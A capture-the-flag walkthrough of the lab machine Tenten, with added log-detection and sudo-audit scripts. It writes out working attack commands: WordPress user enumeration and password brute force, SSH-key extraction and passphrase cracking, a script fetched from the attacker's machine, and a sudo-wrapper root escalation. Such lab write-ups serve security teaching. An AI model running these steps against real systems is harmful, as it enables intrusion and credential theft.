This walkthrough is for the HacktheBox retired machine named Tenten.
We pick Tenten from the list:
Foothold
We do a usual nmap scan:
nmap -sS -T4 -A -p- 10.10.10.10
Output:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-26 20:51 EDT
Nmap scan report for 10.10.10.10
Host is up (0.26s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
| 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: HP P2000 G3 NAS device (94%), Android 4.1.1 (91%), Android 4.1.2 (91%), Linux 3.10 - 4.11 (91%), Linux 3.16 - 4.6 (91%), Linux 3.2 - 4.9 (91%), Android 4.2.2 (Linux 3.4) (91%), DD-WRT v3.0 (Linux 4.4.2) (91%), Linux 4.1 (91%), Linux 4.4 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 413.26 ms 10.10.14.1
2 413.43 ms 10.10.10.10
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 584.34 seconds
While it was scanning I tried the default port 80 in the browser, http://10.10.10.10, and could see right away that we get a WordPress site:
From looking around, we just have the default theme, post, and comment on it.
But the Job Listing is a menu link. Let’s explore it, but first run wpscan against it:
wpscan -e u --url http://10.10.10.10
We want to enumerate user IDs with the -e u switch, and see whether the scan also turns up vulnerabilities, versions, and exposed files. User enumeration can also be done manually by appending /wp-json/wp/v2/users/ to the site URL.
Output:
WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.10.10/
[+] Started: Thu Sep 26 20:58:52 2019
Interesting Finding(s):
[+] http://10.10.10.10/
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://10.10.10.10/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://10.10.10.10/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://10.10.10.10/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
| Detected By: Rss Generator (Passive Detection)
| - http://10.10.10.10/index.php/feed/, <generator>https://wordpress.org/?v=4.7.3</generator>
| - http://10.10.10.10/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.3</generator>
|
| [!] 35 vulnerabilities identified:
|
...
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.10.10/wp-content/themes/twentyseventeen/
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://10.10.10.10/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.2
| Style URL: http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3, Match: 'Version: 1.1'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <=====================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] takis
| Detected By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Finished: Thu Sep 26 20:59:05 2019
[+] Requests Done: 70
[+] Cached Requests: 7
[+] Data Sent: 14.062 KB
[+] Data Received: 24.943 MB
[+] Memory used: 111.887 MB
[+] Elapsed time: 00:00:12
We have a user: takis.
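The scan found takis through the author pattern, the wp-json users endpoint and login error messages. Those same requests are what a site owner would look for in the web server logs; this added example (not part of the walkthrough) does that over constructed Apache access-log lines, with 10.10.14.5 and 203.0.113.9 as assumed client addresses:

```shell
#!/bin/sh
# Added example, not from the walkthrough: find the user-enumeration traffic a
# wpscan "-e u" run leaves in Apache access logs. The log lines are constructed
# to mirror the probes the scan output above lists: the wp-json users endpoint,
# the ?author=N pattern, and login attempts used for error-message checks.

SAMPLE_LOG='10.10.14.5 - - [26/Sep/2019:20:58:53 -0400] "GET / HTTP/1.1" 200 10523 "-" "WPScan v3.6.3"
10.10.14.5 - - [26/Sep/2019:20:58:54 -0400] "GET /index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 812 "-" "WPScan v3.6.3"
10.10.14.5 - - [26/Sep/2019:20:58:55 -0400] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.6.3"
10.10.14.5 - - [26/Sep/2019:20:58:55 -0400] "GET /?author=2 HTTP/1.1" 404 0 "-" "WPScan v3.6.3"
10.10.14.5 - - [26/Sep/2019:20:58:56 -0400] "POST /wp-login.php HTTP/1.1" 200 3021 "-" "WPScan v3.6.3"
203.0.113.9 - - [26/Sep/2019:21:02:11 -0400] "GET /index.php/2017/04/hello-world/ HTTP/1.1" 200 9100 "-" "Mozilla/5.0"'

# enum_requests LOG: print "client path" for each request that probes usernames.
# A single login POST is normal; it only matters in volume alongside the others.
enum_requests() {
  printf '%s\n' "$1" | awk '
    $7 ~ /\/wp-json\/wp\/v2\/users/ ||
    $7 ~ /[?&]author=[0-9]+/ ||
    ($6 == "\"POST" && $7 ~ /wp-login\.php/) { print $1, $7 }'
}

# enum_count_by_ip LOG: number of such requests per client address.
enum_count_by_ip() {
  enum_requests "$1" | awk '{ n[$1]++ } END { for (ip in n) print ip, n[ip] }' | sort
}

# flag_sources LOG THRESHOLD: clients with at least THRESHOLD probes; alert on these.
flag_sources() {
  enum_count_by_ip "$1" | awk -v t="$2" '$2 >= t { print $1 }'
}

# Demo on the constructed log: the scanner's address stands out, the reader does not.
enum_count_by_ip "$SAMPLE_LOG"
flag_sources "$SAMPLE_LOG" 3
```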
We then run a password attack scan on it:
wpscan -U takis -P /usr/share/wordlists/rockyou.txt --url http://10.10.10.10
While that runs let’s look at the Job Listings link:
Looks like we can upload a file:
We can test this by uploading an image and seeing whether we can find it afterwards.
I right-clicked and saved the banner image as banner.jpg to use as the CV file.
After doing some reading it looks like the Job Manager plugin creates a new private page whenever a resume is uploaded. When we first submitted the application, we may have noticed the /apply/8/ in the URL; because the Hello World post is post 1 and this one is post 8, let’s see what the in-between and later ones are.
As you can see, we’re getting the drafts and unpublished posts, so the uploaded file must be accessible somewhere.
Generally, the file upload path of WordPress is wp-content/uploads/<year>/<month>/<filename>.
So we try it (replacing the month and year to current values):
http://10.10.10.10/wp-content/uploads/2019/09/banner.jpg
And it works.
I attempted to upload a reverse shell PHP file by disguising it as a jpg or csv, but was not successful.
Back to enumerating the private posts, we see post 13 has an interesting message:
Given that they made one titled "banner" for the banner.jpg I uploaded, I am going to check whether this one is a photo too. From the Archive page, it looks like it was made in April 2017.
http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
This might be one of those boxes where the message is (unrealistically) hidden in the image.
So we download it:
wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
I couldn’t see much using stegsolve, so I try steghide:
Setup files:
🔗 https://github.com/StefanoDeVuono/steghide
apt install -y libjpeg-dev libmcrypt-dev libmhash-dev
apt install -y steghide
Check it against the file; I took a guess and left the passphrase blank:
steghide extract -sf HackerAccessGranted.jpg
Enter passphrase: <empty>
wrote extracted data to "id_rsa".
Looks like an ssh key:
cat id_rsa
User
We get a private key, which is still encrypted.
If we try to ssh as the user with this key it won’t work, because the key is still encrypted. Let’s attempt to crack its passphrase with john:
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash && /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
We get the password: superpassword.
We then attempt to log in with it, using the -i switch to specify the identity file path:
ssh -i id_rsa takis@10.10.10.10
Then start with getting the user flag.
cat user.txt
We get user.txt.
Privilege Escalation
As a bit of a detour I checked out the WordPress config file to see whether the root user reused any of the passwords stored in it.
vi /var/www/html/wp-config.php
I didn’t really get anywhere from there.
Since we have the shell open, we start a simple web server on our local machine and transfer over our enumeration script.
On our local Kali machine:
python -m SimpleHTTPServer 9999
We can use rebootuser’s LinEnum.sh:
wget -O enum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Then back in our shell on the target:
cd /tmp/ && wget http://10.10.XXX.XXX:9999/enum.sh
After it runs, it indicates that we have a sudo-privileged script that can be run without a password:
[+] We can sudo without supplying a password!
Matching Defaults entries for takis on tenten:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User takis may run the following commands on tenten:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/fuckin
We check the file with cat /bin/fuckin:
#!/bin/bash
$1 $2 $3 $4
So it takes up to four arguments and runs them as a command through bash. We can use it to spawn a bash shell:
sudo /bin/fuckin /bin/bash
Alright, it worked.
id
uid=0(root) gid=0(root) groups=0(root)
We then get to the root flag:
cat /root/root.txt
Success 😎 .
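The root path came from a NOPASSWD sudo entry pointing at a two-line wrapper that executes whatever it is given. As an added example (not the box’s own code or the walkthrough’s), the script below checks a sudo -l listing and a script body for that pattern, and shows an allow-list rewrite; the sudo -l text is constructed from the output above and the web-server actions in the safe wrapper are an assumed use case:

```shell
#!/bin/sh
# Added example, not part of the walkthrough: audit a NOPASSWD sudo entry the
# way a defender would, and show an allow-list rewrite of the wrapper script.

# Constructed "sudo -l" output, shaped like the one LinEnum reported on the box.
SAMPLE_SUDO_L='User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin'

# Constructed copy of the wrapper at /bin/fuckin: each argument becomes a
# command word run as root, so any program at all can be launched through it.
UNSAFE_WRAPPER='#!/bin/bash
$1 $2 $3 $4'

# Hardened replacement (assumed use case: let takis manage the web server).
# The caller names an action; no argument is ever executed as a command.
SAFE_WRAPPER='#!/bin/bash
case "$1" in
  restart-web) exec /bin/systemctl restart apache2 ;;
  show-log)    exec /usr/bin/tail -n 50 /var/log/apache2/error.log ;;
  *)           echo "usage: $0 {restart-web|show-log}" >&2; exit 64 ;;
esac'

# nopasswd_targets SUDO_L_TEXT: print each command path granted NOPASSWD.
nopasswd_targets() {
  printf '%s\n' "$1" | sed -n 's/.*NOPASSWD:[[:space:]]*//p'
}

# forwards_args BODY: succeeds when a positional parameter ($1, $@, $*, ${1}...)
# sits where a command name goes: at line start or after ; | & ( or a backtick.
forwards_args() {
  printf '%s\n' "$1" | grep -Eq '(^|[;|&(`][[:space:]]*)\$[{]?[0-9@*]'
}

# classify_wrapper BODY: "unsafe" if the script executes its arguments, else "ok".
classify_wrapper() {
  if forwards_args "$1"; then echo unsafe; else echo ok; fi
}

# Demo: list the NOPASSWD commands, then rate both wrapper bodies.
for cmd in $(nopasswd_targets "$SAMPLE_SUDO_L"); do
  echo "NOPASSWD command: $cmd"
done
echo "page wrapper:       $(classify_wrapper "$UNSAFE_WRAPPER")"
echo "allow-list wrapper: $(classify_wrapper "$SAFE_WRAPPER")"
```

The check is a heuristic for review, not a proof: a wrapper can still be dangerous through an editor, pager or shell escape even when it never expands an argument as a command, so the NOPASSWD target itself has to be read.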